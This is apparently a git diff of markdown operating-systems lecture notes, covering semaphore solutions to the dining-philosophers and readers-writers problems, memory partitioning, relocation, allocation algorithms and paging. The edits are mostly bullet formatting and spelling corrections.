Setting the semaphore to 2 allows the possibility of 2 philosophers to eat at one time. If these two philosophers are sitting next to each other then they will try to grab the same fork. The code will not deadlock, however only one (sometimes two) philosopher(s) is able to eat.
|
||||
|
||||
|
||||
Setting the semaphore to 2 allows the possibility of two philosophers eating at one time. If these two philosophers are sitting next to each other, they will try to grab the same fork. The code will not deadlock, but only one (sometimes two) philosopher(s) can eat.
|
||||
|
||||
### Solution 3
|
||||
|
||||
@@ -43,12 +39,12 @@ A more sophisticated solution is necessary to allow **maximum parallelism**
|
||||
|
||||
The solution uses:
|
||||
|
||||
> * `state[N]` : one **state variable** for every philosopher (`THINKING` `HUNGRY` and `EATING`)
|
||||
> * `phil[N] ` : one **semaphore per philosopher** (i.e. **not forks** initialised to 0)
|
||||
> * The philosopher goes to sleep if one of their neighbours are eating
|
||||
> * The neighbours wake up the philosopher if they have finished eating
|
||||
> * `sync` : one **semaphore/mutex** to enforce **mutual exclusion** of the critical section (while updating the **states** of `hungry` `thinking` and `eating`)
|
||||
> * A philosopher can only **start eating** if their neighbours are **not eating**.
|
||||
> - `state[N]` : one **state variable** for every philosopher (`THINKING` `HUNGRY` and `EATING`)
|
||||
> - `phil[N] ` : one **semaphore per philosopher** (i.e. **not forks** initialised to 0)
|
||||
> - The philosopher goes to sleep if one of their neighbours is eating
|
||||
> - The neighbours wake up the philosopher if they have finished eating
|
||||
> - `sync` : one **semaphore/mutex** to enforce **mutual exclusion** of the critical section (while updating the **states** of `hungry` `thinking` and `eating`)
|
||||
> - A philosopher can only **start eating** if their neighbours are **not eating**.
|
||||
|
||||

|
||||
|
||||
@@ -111,4 +107,3 @@ void test(int i) {
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
@@ -1,14 +1,14 @@
|
||||
23/10/20
|
||||
|
||||
## The readers-writers Problem
|
||||
## The Readers-Writers Problem
|
||||
|
||||
* Reading a record (or a variable) can happen in parallel without problems, **writing needs synchronisation** (or exclusive access).
|
||||
- Reading a record (or a variable) can happen in parallel without problems. **Writing needs synchronisation** (or exclusive access).
|
||||
|
||||
* Different solutions exist:
|
||||
- Different solutions exist:
|
||||
|
||||
> * Solution 1: naive implementation with limited parallelism
|
||||
> * Solution 2: **readers** receive **priority**. No reader is kept waiting unless a writer already has access (writers may starve).
|
||||
> * Solution 3: **writing** is performed as soon as possible (readers may starve).
|
||||
> - Solution 1: naive implementation with limited parallelism
|
||||
> - Solution 2: **readers** receive **priority**. No reader is kept waiting unless a writer already has access (writers may starve).
|
||||
> - Solution 3: **writing** is performed as soon as possible (readers may starve).
|
||||
|
||||
### Solution 1: No parallelism
|
||||
|
||||
@@ -41,9 +41,9 @@ A correct implementation requires:
|
||||
|
||||
> `iReadCount`: an integer tracking the number of readers
|
||||
>
|
||||
> * if `iReadCount` > 0: writers are blocked `sem_wait(rwSync)`
|
||||
> * if `iReadCount` == 0: writers are released `sem_post(rwSync)`
|
||||
> * if already writing, readers must wait
|
||||
> - if `iReadCount` > 0: writers are blocked `sem_wait(rwSync)`
|
||||
> - if `iReadCount` == 0: writers are released `sem_post(rwSync)`
|
||||
> - if already writing, readers must wait
|
||||
>
|
||||
> `sync`: a mutex for mutual exclusion of `iReadCount`.
|
||||
>
|
||||
@@ -55,9 +55,9 @@ A correct implementation requires:
|
||||
|
||||
When `iReadCount == 1`, the `sem_wait(&rwSync)` is used to block the writer from writing. Further down in the code when `iReadCount == 0`, the `sem_post(&rwSync)` is called to 'wake up' the writer, so that it can write.
|
||||
|
||||
When we say 'send process to sleep' or 'wake up a process' we actually mean: move that process from the blocked queue to the ready queue (or visa versa).
|
||||
When we say 'send a process to sleep' or 'wake up a process', we actually mean: move that process from the blocked queue to the ready queue (or vice versa).
|
||||
|
||||
If the `iReadCount == 1` is run when the writer is writing. The `sem_wait(&rwSync)` will go from 0 -> -1, forcing the reader to go to sleep. As soon as the writer is done, the `sem_post(&rwSync)` is run meaning it goes from -1 -> 0, which wakes the reader up.
|
||||
If `iReadCount == 1` is run when the writer is writing, `sem_wait(&rwSync)` will go from 0 -> -1, forcing the reader to go to sleep. As soon as the writer is done, `sem_post(&rwSync)` is run, meaning it goes from -1 -> 0, which wakes the reader up.
|
||||
|
||||
Unless `iReadCount` reaches 0, writing will not happen. **This means writers can easily starve if there are multiple readers**.
|
||||
|
||||
@@ -65,56 +65,21 @@ Unless `iReadCount` reaches 0, writing will not happen. **This means writers can
|
||||
|
||||
**Solution 3 uses:**
|
||||
|
||||
> * `iReadCount` and `iWriteCount`: to keep track of the number of readers and writers.
|
||||
> * `sRead`/`sWrite`: to synchronise the **reader/writer's critical section**.
|
||||
> * `sReadTry`: to **stop readers** when there is a **writer waiting**.
|
||||
> * `sResource`: to **synchronise** the resource for **reading/writing**.
|
||||
> - `iReadCount` and `iWriteCount`: to keep track of the number of readers and writers.
|
||||
> - `sRead`/`sWrite`: to synchronise the **reader/writer's critical section**.
|
||||
> - `sReadTry`: to **stop readers** when there is a **writer waiting**.
|
||||
> - `sResource`: to **synchronise** the resource for **reading/writing**.
|
||||
|
||||

|
||||
|
||||
[explanation time stamp 43:35]
|
||||
[Explanation timestamp 43:35]
|
||||
|
||||
`sRead` and `sWrite` are used whenever `iReadCount` and `iWriteCount` are used respectively. Unlike the mutex in the last example it is important that the same semaphore variable isn't used for both `iReadCount` and `iWriteCount`.
|
||||
|
||||
There is no reason the read and write count cannot be changed at the same time. If you were to use the same semaphore then you would be limiting the parallelism of your code (slowing run time).
|
||||
There is no reason the read and write counts cannot be changed at the same time. If you were to use the same semaphore, you would be limiting the parallelism of your code (slowing run time).
|
||||
|
||||
In the case `iWriteCount == 1` the `sReadTry` is set from 1 -> 0, meaning that no new readers can attempt to read. For the writer to begin writing, it must wait for the readers to finish reading (due to the `sResource` semaphore.
|
||||
In the case `iWriteCount == 1`, `sReadTry` is set from 1 -> 0, meaning that no new readers can attempt to read. For the writer to begin writing, it must wait for the readers to finish reading (due to the `sResource` semaphore).
|
||||
|
||||
So when `iReadCount --`, the reader checks if it is the last reader by `iReadCount == 0`, and if it is it unlocks `sResource` (-1->0) so that the writers can write. If more readers show up, they cannot enter as `sReadTry == -1`.
|
||||
|
||||
The last writer does the same thing, but instead of unlocking the resource it unlocks the `sReadTry` semaphore.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -4,10 +4,10 @@
|
||||
|
||||
Computers typically have memory hierarchies:
|
||||
|
||||
> * Registers
|
||||
> * L1/L2/L3 cache
|
||||
> * Main memory (RAM)
|
||||
> * Disks
|
||||
> - Registers
|
||||
> - L1/L2/L3 cache
|
||||
> - Main memory (RAM)
|
||||
> - Disks
|
||||
|
||||
**Higher Memory** is faster, more expensive and volatile. **Lower Memory** is slower, cheaper and non-volatile.
|
||||
|
||||
@@ -15,15 +15,13 @@ The operating system provides **memory abstraction** for the user. Otherwise mem
|
||||
|
||||
### OS Responsibilities
|
||||
|
||||
* Allocate/de-allocate memory when requested by processes, keep track of all used/unused memory.
|
||||
* Distribute memory between processes and simulate an **indefinitely large** memory space. The OS must create the illusion of having infinite main memory, processes assume they have access to all main memory.
|
||||
* **Control access** when multi programming is applied.
|
||||
* **Transparently** move data from **memory** to **disk** and vice versa.
|
||||
- Allocate/deallocate memory when requested by processes and keep track of all used/unused memory.
|
||||
- Distribute memory between processes and simulate an **indefinitely large** memory space. The OS must create the illusion of having infinite main memory. Processes assume they have access to all main memory.
|
||||
- **Control access** when multi-programming is applied.
|
||||
- **Transparently** move data from **memory** to **disk** and vice versa.
|
||||
|
||||
#### Partitioning
|
||||
|
||||

|
||||
|
||||
##### Contiguous memory management
|
||||
|
||||
Allocates memory in **one single block** without any holes or gaps.
|
||||
@@ -36,48 +34,44 @@ Where memory is allocated in multiple blocks, or segments, which may not be plac
|
||||
|
||||
**Multi-programming** with **fixed partitions**
|
||||
|
||||
* Fixed **equal** sized partitions
|
||||
* Fixed non-equal sized partitions
|
||||
- Fixed **equal-sized** partitions
|
||||
- Fixed non-equal-sized partitions
|
||||
|
||||
**Multi-programming** with **dynamic partitions**
|
||||
|
||||
#### Mono-programming
|
||||
|
||||
> * Only one single user process is in memory/executed at any point in time.
|
||||
> * A fixed region of memory is allocated to the OS & kernal, the remaining memory is reserved for a single process
|
||||
> * This process has direct access to physical memory (no address translation takes place)
|
||||
> * Every process is allocated **contiguous block memory** (no holes or gaps)
|
||||
> * One process is allocated the **entire memory space** and the process is always located in the same address space.
|
||||
> * **No protection** between different user processes required. Also no protection between the running process and the OS, so sometimes that process can access pieces of the OS its not meant to.
|
||||
> - Only one single user process is in memory/executed at any point in time.
|
||||
> - A fixed region of memory is allocated to the OS and kernel. The remaining memory is reserved for a single process
|
||||
> - This process has direct access to physical memory (no address translation takes place)
|
||||
> - Every process is allocated **a contiguous block of memory** (no holes or gaps)
|
||||
> - One process is allocated the **entire memory space** and the process is always located in the same address space.
|
||||
> - **No protection** between different user processes is required. There is also no protection between the running process and the OS, so sometimes that process can access pieces of the OS it's not meant to.
|
||||
>
|
||||
> * Overlays enable the **programmer** to use **more memory than available**.
|
||||
> - Overlays enable the **programmer** to use **more memory than available**.
|
||||
|
||||

|
||||
##### Shortcomings of Mono-Programming
|
||||
|
||||
##### Short comings of mono-programming
|
||||
> - Since a process has direct access to the physical memory, it may have access to the OS memory.
|
||||
> - The OS can be seen as a process - so we have **two processes anyway**.
|
||||
> - **Low utilisation** of hardware resources (CPU, I/O devices etc)
|
||||
> - Mono-programming is unacceptable as **multi-programming is expected** on modern machines
|
||||
|
||||
> * Since a process has direct access to the physical memory, it may have access to the OS memory.
|
||||
> * The OS can be seen as a process - so we have **two processes anyway**.
|
||||
> * **Low utilisation** of hardware resources (CPU, I/O devices etc)
|
||||
> * Mono-programming is unacceptable as **multi-programming is excepted** on modern machines
|
||||
|
||||
**Direct memory access** and **mono-programming** are common in basic embedded systems and modern consumer electronics eg washing machines, microwaves, cars etc.
|
||||
**Direct memory access** and **mono-programming** are common in basic embedded systems and modern consumer electronics, e.g. washing machines, microwaves and cars.
|
||||
|
||||
##### Simulating Multi-Programming
|
||||
|
||||
We can simulate multi-programming through **swapping**
|
||||
|
||||
* **Swap process** out to the disk and load a new one (context switches would become **time consuming**)
|
||||
- **Swap process** out to the disk and load a new one (context switches would become **time consuming**)
|
||||
|
||||
Why Multi-Programming is better theoretically
|
||||
|
||||
> * There are *n* **processes in memory**
|
||||
> * A process spends *p* percent of its time **waiting for I/O**
|
||||
> * **CPU Utilisation** is calculated as 1 minus the time that all processes are waiting for I/O
|
||||
> * The probability that **all** *n* **processes are waitying for I/O is *p*^n^
|
||||
> * Therefore CPU utilisation is given by $1 - p^{n}$
|
||||
|
||||

|
||||
> - There are *n* **processes in memory**
|
||||
> - A process spends *p* percent of its time **waiting for I/O**
|
||||
> - **CPU Utilisation** is calculated as 1 minus the time that all processes are waiting for I/O
|
||||
> - The probability that **all** *n* **processes are waiting for I/O** is $p^{n}$
|
||||
> - Therefore CPU utilisation is given by $1 - p^{n}$
|
||||
|
||||
With an **I/O wait time of 20%** almost **100% CPU utilisation** can be achieved with four processes ($1-0.2^{4}$)
|
||||
|
||||
@@ -89,49 +83,47 @@ CPU utilisation **goes up** with the **number of processes** and **down** for **
|
||||
|
||||
**Assume that**:
|
||||
|
||||
> * A computer has one megabyte of memory
|
||||
> * The OS takes up 200k, leaving room for four 200k processes
|
||||
> - A computer has one megabyte of memory
|
||||
> - The OS takes up 200k, leaving room for four 200k processes
|
||||
|
||||
**Then:**
|
||||
|
||||
> * If we have an I/O wait time of 80%, then we will achieve just under 60% CPU utilisation (1-0.8^4^)
|
||||
> * If we add another megabyte of memory, it would allow us to run another five processes. We can now achieve about **87%** CPU utilisation (1-0.8^9^)
|
||||
> * If we add another megabyte of memory (14 processes) we find that CPU utilisation will increase to around **96%**
|
||||
> - If we have an I/O wait time of 80%, then we will achieve just under 60% CPU utilisation ($1-0.8^{4}$)
|
||||
> - If we add another megabyte of memory, it would allow us to run another five processes. We can now achieve about **87%** CPU utilisation ($1-0.8^{9}$)
|
||||
> - If we add another megabyte of memory (14 processes) we find that CPU utilisation will increase to around **96%**
|
||||
|
||||
##### Caveats
|
||||
|
||||
* This model assumes that all processes are independent, this is not true.
|
||||
* More complex models could be built using **queuing theory** but we still use this simplistic model to make **approximate predictions**
|
||||
- This model assumes that all processes are independent. This is not true.
|
||||
- More complex models could be built using **queuing theory** but we still use this simplistic model to make **approximate predictions**
|
||||
|
||||
#### Fixed Size Partitions
|
||||
|
||||
* Divide memory into **static**, **contiguous** and **equal sized** partitions that have a fixed **size and location**.
|
||||
* Any process can take **any** partition. (as long as its large enough)
|
||||
* Allocation of **fixed equal sized partitions to processes is trivial**
|
||||
* Very **little overhead** and **simple implementation**
|
||||
* The OS keeps a track of which partitions are being **used** and which are **free**.
|
||||
- Divide memory into **static**, **contiguous** and **equal sized** partitions that have a fixed **size and location**.
|
||||
- Any process can take **any** partition (as long as it's large enough)
|
||||
- Allocation of **fixed equal sized partitions to processes is trivial**
|
||||
- Very **little overhead** and **simple implementation**
|
||||
- The OS keeps track of which partitions are being **used** and which are **free**.
|
||||
|
||||
##### Disadvantages
|
||||
|
||||
* Partition may be necessarily large
|
||||
* Low memory utilisation
|
||||
* Internal fragmentation
|
||||
* **Overlays** must be used if a program does not fit into a partition (burden on the programmer)
|
||||
- Partition may be necessarily large
|
||||
- Low memory utilisation
|
||||
- Internal fragmentation
|
||||
- **Overlays** must be used if a program does not fit into a partition (burden on the programmer)
|
||||
|
||||
#### Fixed Partitions of non-equal size
|
||||
|
||||
* Divide memory into **static** and **non-equal sized partitions** that have **fixed size and location**
|
||||
* Reduces **internal fragmentation**
|
||||
* The **allocation** of processes to partitions must be **carefully considered**.
|
||||
|
||||

|
||||
- Divide memory into **static** and **non-equal sized partitions** that have **fixed size and location**
|
||||
- Reduces **internal fragmentation**
|
||||
- The **allocation** of processes to partitions must be **carefully considered**.
|
||||
|
||||
**One private queue per partition**:
|
||||
|
||||
* Assigns each process to the smallest partition that it would fit in.
|
||||
* Reduces **internal fragmentation**.
|
||||
* Can reduce memory utilisation (e.g. lots of small jobs result in unused large partitions)
|
||||
- Assigns each process to the smallest partition that it would fit in.
|
||||
- Reduces **internal fragmentation**.
|
||||
- Can reduce memory utilisation (e.g. lots of small jobs result in unused large partitions)
|
||||
|
||||
**A single shared queue:**
|
||||
|
||||
* Increased internal fragmentation as small processes are allocated into big partitions.
|
||||
- Increased internal fragmentation as small processes are allocated into big partitions.
|
||||
@@ -26,7 +26,7 @@ int main() {
|
||||
|
||||
The addresses will be the same, as memory management within a process is the same. The process doesn't know where it is in memory, however the process is allocated the same amount of memory and the address is relative to the process.
|
||||
|
||||
If the process is run twice, they are allocated two different memory spaces, so the addresses will be the same.
|
||||
If the process is run twice, the two instances are allocated different memory spaces, so the addresses will be the same.
|
||||
|
||||
[explanation 8:05]
|
||||
|
||||
@@ -34,9 +34,9 @@ If the process is run twice, they are allocated two different memory spaces, so
|
||||
|
||||
When a program is run, it does not know in advance which partition it will occupy.
|
||||
|
||||
* The program **cannot** simply **generate static addresses** (like jump instructions) that are absolute
|
||||
* **Addresses should be relative to where the program has been loaded**.
|
||||
* Relocation must be **solved in an operating system** that allows **processes to run at changing memory locations**.
|
||||
- The program **cannot** simply **generate static addresses** (like jump instructions) that are absolute
|
||||
- **Addresses should be relative to where the program has been loaded**.
|
||||
- Relocation must be **solved in an operating system** that allows **processes to run at changing memory locations**.
|
||||
|
||||
**Protection**: Once you can have two programs in memory at the same time, protection must be enforced.
|
||||
|
||||
@@ -44,52 +44,50 @@ When a program is run, it does not know in advance which partition it will occup
|
||||
|
||||
**Logical Address**: is a memory address seen by the process
|
||||
|
||||
* It is independent of the current physical memory assignment
|
||||
* It is relative to the start of the program
|
||||
- It is independent of the current physical memory assignment
|
||||
- It is relative to the start of the program
|
||||
|
||||
**Physical address**: refers to an actual location in main memory
|
||||
|
||||
The **logical address space** must be **mapped** onto the **machines physical address space**.
|
||||
The **logical address space** must be **mapped** onto the **machine's physical address space**.
|
||||
|
||||
### Static Relocation
|
||||
|
||||
This happens at compile time, a process has to be located at the same location every single time (impractical)
|
||||
This happens at compile time. A process has to be located at the same location every single time (impractical).
|
||||
|
||||
### Dynamic Relocation
|
||||
|
||||
This happens at load time
|
||||
|
||||
* An **offset is added to every logical address** to account for its physical location in memory.
|
||||
* **Slows down the loading** of a process, does not account for **swapping**
|
||||
- An **offset is added to every logical address** to account for its physical location in memory.
|
||||
- **Slows down the loading** of a process, does not account for **swapping**
|
||||
|
||||
### Dynamic Relocation at run-time
|
||||
|
||||
Two special purpose registers are maintained in the CPU (the **MMU**) containing a **base address** and **limit**
|
||||
Two special-purpose registers are maintained in the CPU (the **MMU**), containing a **base address** and **limit**.
|
||||
|
||||
> * The **base register** stores the **start address** of the partition.
|
||||
> * The **limit register** holds the **size** of the partition.
|
||||
> - The **base register** stores the **start address** of the partition.
|
||||
> - The **limit register** holds the **size** of the partition.
|
||||
>
|
||||
> At **run-time**
|
||||
>
|
||||
> * The base register is added to the **logical (relative) address** to generate the physical address.
|
||||
> * The resulting address is **compared** against the **limit register**. This allows us to see the bounds of where the process exists.
|
||||
> - The base register is added to the **logical (relative) address** to generate the physical address.
|
||||
> - The resulting address is **compared** against the **limit register**. This allows us to see the bounds of where the process exists.
|
||||
>
|
||||
> NOTE: This requires **hardware support** (which didn't exist in the early days).
|
||||
|
||||
<img src="assets/G.png" alt="registers" style="zoom:80%;" />
|
||||
|
||||
#### Dynamic Partitioning
|
||||
|
||||
**Fixed partitioning** results in **internal fragmentation**:
|
||||
|
||||
> An exact match between the requirements of the process and the available partitions **may not exist**.
|
||||
>
|
||||
> * This means the partition may **not be used in its entirety**.
|
||||
> - This means the partition may **not be used in its entirety**.
|
||||
|
||||
**Dynamic Partitioning**
|
||||
|
||||
> * A **variable number of partitions** of which the **size** and **starting address** can **change over time**.
|
||||
> * A process is allocated the **exact amount** of **contiguous memory it requires**, thereby preventing internal fragmentation.
|
||||
> - A **variable number of partitions** of which the **size** and **starting address** can **change over time**.
|
||||
> - A process is allocated the **exact amount** of **contiguous memory it requires**, thereby preventing internal fragmentation.
|
||||
|
||||

|
||||
|
||||
@@ -97,10 +95,10 @@ Two special purpose registers are maintained in the CPU (the **MMU**) containing
|
||||
|
||||
Reasons for **swapping**:
|
||||
|
||||
> * Some processes only **run occasionally**.
|
||||
> * We have more **processes** than **partitions**.
|
||||
> * A process's **memory requirements** may have **changed**.
|
||||
> * The **total amount of memory that is required** for the process **exceeds the available memory**.
|
||||
> - Some processes only **run occasionally**.
|
||||
> - We have more **processes** than **partitions**.
|
||||
> - A process's **memory requirements** may have **changed**.
|
||||
> - The **total amount of memory that is required** for the process **exceeds the available memory**.
|
||||
|
||||
For any given process, we might not know the exact **memory requirements**. This is because processes may involve dynamic parts.
|
||||
|
||||
@@ -110,15 +108,13 @@ For any given process, we might not know the exact **memory requirements**. This
|
||||
>
|
||||
> The 'bit extra' will try and account for the dynamic nature of the process.
|
||||
>
|
||||
> If the process out grows it's partition, then it is shuttled out onto the main disk and allocated a new partition.
|
||||
|
||||

|
||||
> If the process outgrows its partition, it is shuttled out onto the main disk and allocated a new partition.
|
||||
|
||||
##### External Fragmentation
|
||||
|
||||
> * Swapping a process out of memory will **create 'a hole'**
|
||||
> * A new process may not **use the entire 'hole'**, leaving a small **unused block**
|
||||
> * A new process may be **too large for a given 'hole'**
|
||||
> - Swapping a process out of memory will **create 'a hole'**
|
||||
> - A new process may not **use the entire 'hole'**, leaving a small **unused block**
|
||||
> - A new process may be **too large for a given 'hole'**
|
||||
>
|
||||
> The **overhead** of memory **compaction** to **recover holes** can be **prohibitive** and requires **dynamic relocation**.
|
||||
|
||||
@@ -126,26 +122,26 @@ For any given process, we might not know the exact **memory requirements**. This
|
||||
|
||||
**Bitmaps**:
|
||||
|
||||
> * The simplest data structure that can be used is a **bitmap**.
|
||||
> * **Memory is split into blocks** of 4 Kb size.
|
||||
> * A bitmap is set up so that each **bit is 0** if the memory block is free, and 1 if the **block is being used**
|
||||
> * 32 Mb memory / 4 Kb blocks = 8192 bitmap entries
|
||||
> * 8192 bits occupy 1 Kb of storage (8192 / 8)
|
||||
> * The size of this bitmap will depend on the **size of the memory** and the **size of the allocation unit**.
|
||||
> * To find a hole of say 128 K, then a group of **32 adjacent bits set to 0** must be found
|
||||
> * Typically a long operation, the longer it takes, the lower the CPU utilisation is.
|
||||
> * A **trade-off exists** between the **size of the bitmap** and the **size of the blocks**
|
||||
> * The size of the bitmaps can become prohibitive for small blocks and may make searching the bitmap slower
|
||||
> * Larger blocks may increase internal fragmentation.
|
||||
> * **Bitmaps are rarely used** because of this trade off
|
||||
> - The simplest data structure that can be used is a **bitmap**.
|
||||
> - **Memory is split into blocks** of 4 Kb size.
|
||||
> - A bitmap is set up so that each **bit is 0** if the memory block is free, and 1 if the **block is being used**
|
||||
> - 32 Mb memory / 4 Kb blocks = 8192 bitmap entries
|
||||
> - 8192 bits occupy 1 Kb of storage (8192 / 8)
|
||||
> - The size of this bitmap will depend on the **size of the memory** and the **size of the allocation unit**.
|
||||
> - To find a hole of say 128 K, then a group of **32 adjacent bits set to 0** must be found
|
||||
> - Typically a long operation, the longer it takes, the lower the CPU utilisation is.
|
||||
> - A **trade-off exists** between the **size of the bitmap** and the **size of the blocks**
|
||||
> - The size of the bitmaps can become prohibitive for small blocks and may make searching the bitmap slower
|
||||
> - Larger blocks may increase internal fragmentation.
|
||||
> - **Bitmaps are rarely used** because of this trade-off
|
||||
|
||||
**Linked List**:
|
||||
|
||||
A more **sophisticated data structure** is required to deal with a **variable number** of **free and used partitions**.
|
||||
|
||||
> * A linked list consists of a **number of entries** (links)
|
||||
> * Each link **contains data items** e.g. **start of memory block**, **size** and a flag for free and allocated
|
||||
> * It also contains a pointer to the next link.
|
||||
> - A linked list consists of a **number of entries** (links)
|
||||
> - Each link **contains data items** e.g. **start of memory block**, **size** and a flag for free and allocated
|
||||
> - It also contains a pointer to the next link.
|
||||
|
||||

|
||||
|
||||
|
||||
@@ -6,94 +6,88 @@
|
||||
|
||||
#### First Fit
|
||||
|
||||
> * First fit starts scanning **from the start** of the linked list until a link is found, which can fit the process
|
||||
> * If the requested space is **the exact same size** as the 'hole', all the space is allocated
|
||||
> * Otherwise the free link is split into two:
|
||||
> * The first entry is set to the **size requested** and marked **used**
|
||||
> * The second entry is set to **remaining size** and **free**.
|
||||
> - First fit starts scanning **from the start** of the linked list until a link is found, which can fit the process
|
||||
> - If the requested space is **the exact same size** as the 'hole', all the space is allocated
|
||||
> - Otherwise the free link is split into two:
|
||||
> - The first entry is set to the **size requested** and marked **used**
|
||||
> - The second entry is set to **remaining size** and **free**.
|
||||
|
||||
#### Next Fit
|
||||
|
||||
> * The next fit algorithm maintains a record of where it got to last time and restarts it's search from there
|
||||
> * This gives an even chance to all memory to get allocated (first fit concentrates on the start of the list)
|
||||
> * However simulations have been run which show that this is worse than first fit.
|
||||
> * This is because a side effect of **first fit** is that it leaves larger partitions towards the end of memory, which is useful for larger processes.
|
||||
> - The next fit algorithm maintains a record of where it got to last time and restarts its search from there
|
||||
> - This gives an even chance to all memory to get allocated (first fit concentrates on the start of the list)
|
||||
> - However simulations have been run which show that this is worse than first fit.
|
||||
> - This is because a side effect of **first fit** is that it leaves larger partitions towards the end of memory, which is useful for larger processes.
|
||||
|
||||
#### Best Fit
|
||||
|
||||
> * The best fit algorithm always **searches the entire linked list** to find the smallest hole that's big enough to fit the memory requirements of the process.
|
||||
> * It is **slower** than first fit
|
||||
> * It also results in more wasted memory. As a exact sized hole is unlikely to be found, this leaves tiny (and useless) holes.
|
||||
> - The best fit algorithm always **searches the entire linked list** to find the smallest hole that's big enough to fit the memory requirements of the process.
|
||||
> - It is **slower** than first fit
|
||||
> - It also results in more wasted memory. As an exact-sized hole is unlikely to be found, this leaves tiny (and useless) holes.
|
||||
>
|
||||
> Complexity: $O(n)$
|
||||
|
||||
#### Worst Fit
|
||||
|
||||
> Tiny holes are created when best fit split an empty partition.
|
||||
> Tiny holes are created when best fit splits an empty partition.
|
||||
>
|
||||
> * The **worst fit algorithm** finds the **largest available empty partition** and splits it.
|
||||
> * The **left over partition** is hopefully **still useful**
|
||||
> * However simulations show that this method **isn't very good**.
|
||||
> - The **worst fit algorithm** finds the **largest available empty partition** and splits it.
|
||||
> - The **leftover partition** is hopefully **still useful**
|
||||
> - However simulations show that this method **isn't very good**.
|
||||
>
|
||||
> Complexity: $O(n)$
|
||||
|
||||
#### Quick Fit
|
||||
|
||||
> * Quick fit maintains a **list of commonly used sizes**
|
||||
> * For example a separate list for each of 4 Kb, 8 Kb, 12 Kb etc holes
|
||||
> * Odd sized holes can either go into the nearest size or into a special separate list.
|
||||
> * This is much f**aster than the other solutions**, however similar to **best fit** it creates **many tiny holes**.
|
||||
> * Finding neighbours for **coalescing** (combining empty partitions) becomes more difficult & time consuming.
|
||||
> - Quick fit maintains a **list of commonly used sizes**
|
||||
> - For example a separate list for each of 4 Kb, 8 Kb, 12 Kb etc holes
|
||||
> - Odd sized holes can either go into the nearest size or into a special separate list.
|
||||
> - This is much **faster than the other solutions**, but, similarly to **best fit**, it creates **many tiny holes**.
|
||||
> - Finding neighbours for **coalescing** (combining empty partitions) becomes more difficult & time consuming.
|
||||
|
||||
### Coalescing
|
||||
|
||||
Coalescing (join together) takes place when **two adjacent entries** in the linked list become free.
|
||||
|
||||
* Both neighbours are examined when a **block is freed**
|
||||
* If either (or both) are also **free** then the two (or three) **entries are combined** into one larger block by adding up the sizes
|
||||
* The earlier block in the linked list gives the **start point**
|
||||
* The **separate links are deleted** and a **single link inserted**.
|
||||
- Both neighbours are examined when a **block is freed**
|
||||
- If either (or both) are also **free** then the two (or three) **entries are combined** into one larger block by adding up the sizes
|
||||
- The earlier block in the linked list gives the **start point**
|
||||
- The **separate links are deleted** and a **single link inserted**.
|
||||
|
||||
### Compacting
|
||||
|
||||
Even with coalescing happening automatically, **free blocks** may still be **distributed across memory**
|
||||
|
||||
> * Compacting can be used to join free and used memory
|
||||
> * However compacting is more **difficult and time consuming** to implement then coalescing.
|
||||
> * Each **process is swapped** out & **free space coalesced**.
|
||||
> * Processes are swapped back in at lowest available location.
|
||||
> - Compacting can be used to join free and used memory
|
||||
> - However, compacting is more **difficult and time-consuming** to implement than coalescing.
|
||||
> - Each **process is swapped** out & **free space coalesced**.
|
||||
> - Processes are swapped back in at lowest available location.
|
||||
|
||||
## Paging
|
||||
|
||||
Paging uses the principles of **fixed partitioning** and **code re-location** to devise a new **non-contiguous management scheme**
|
||||
Paging uses the principles of **fixed partitioning** and **code relocation** to devise a new **non-contiguous management scheme**.
|
||||
|
||||
> * Memory is split into much **smaller blocks** and **one or multiple blocks** are allocated to a process (e.g. a 11 Kb process would take 3 blocks of 4 Kb)
|
||||
> * These blocks **do not have to be contiguous in main memory**, but **the process still perceives them to be contiguous**
|
||||
> * Benefits:
|
||||
> * **Internal fragmentation** is reduced to the **last block only** (e.g. previous example the third block, only 3 Kb will be used)
|
||||
> * There is **no external fragmentation**, since physical blocks are **stacked directly onto each other** in main memory.
|
||||
|
||||

|
||||
|
||||

|
||||
> - Memory is split into much **smaller blocks** and **one or multiple blocks** are allocated to a process (e.g. an 11 Kb process would take 3 blocks of 4 Kb)
|
||||
> - These blocks **do not have to be contiguous in main memory**, but **the process still perceives them to be contiguous**
|
||||
> - Benefits:
|
||||
> - **Internal fragmentation** is reduced to the **last block only** (e.g. previous example the third block, only 3 Kb will be used)
|
||||
> - There is **no external fragmentation**, since physical blocks are **stacked directly onto each other** in main memory.
|
||||
|
||||

|
||||
|
||||
A **page** is a **small block** of **contiguous memory** in the **logical address space** (as seen by the process)
|
||||
|
||||
* A **frame** is a **small contiguous block** in **physical memory**.
|
||||
* Pages and frames (usually) have the **same size**:
|
||||
* The size is usually a power of 2.
|
||||
* Size range between 512 bytes and 1 Gb. (most common 4 Kb pages & frames)
|
||||
- A **frame** is a **small contiguous block** in **physical memory**.
|
||||
- Pages and frames (usually) have the **same size**:
|
||||
- The size is usually a power of 2.
|
||||
- Sizes range between 512 bytes and 1 Gb (most commonly 4 Kb pages and frames)
|
||||
|
||||
**Logical address** (page number, offset within page) needs to be **translated** into a **physical address** (frame number, offset within frame)
|
||||
|
||||
* Multiple **base registers** will be required
|
||||
* Each logical page needs a **separate base register** that specifies the start of the associated frame
|
||||
* i.e a **set of base registers** has to be maintained for each process
|
||||
* The base registers are stored in the **page table**
|
||||
|
||||

|
||||
- Multiple **base registers** will be required
|
||||
- Each logical page needs a **separate base register** that specifies the start of the associated frame
|
||||
- i.e. a **set of base registers** has to be maintained for each process
|
||||
- The base registers are stored in the **page table**
|
||||
|
||||
The page table can be seen as a **function**, that **maps the page number** of the logical address **onto the frame number** of the physical address
|
||||
|
||||
@@ -101,11 +95,11 @@ $$
|
||||
frameNumber = f(pageNumber)
|
||||
$$
|
||||
|
||||
* The **page number** is used as an **index to the page table** that lists the **location of the associated frame**.
|
||||
* It is the OS' duty to maintain a list of **free frames**.
|
||||
- The **page number** is used as an **index to the page table** that lists the **location of the associated frame**.
|
||||
- It is the OS' duty to maintain a list of **free frames**.
|
||||
|
||||

|
||||
|
||||
We can see that the **only difference** between the logical address and physical address is the **4 left most bits** (the **page number and frame number**). As **pages and frames are the same size**, then the **offset value will be the same for both**.
|
||||
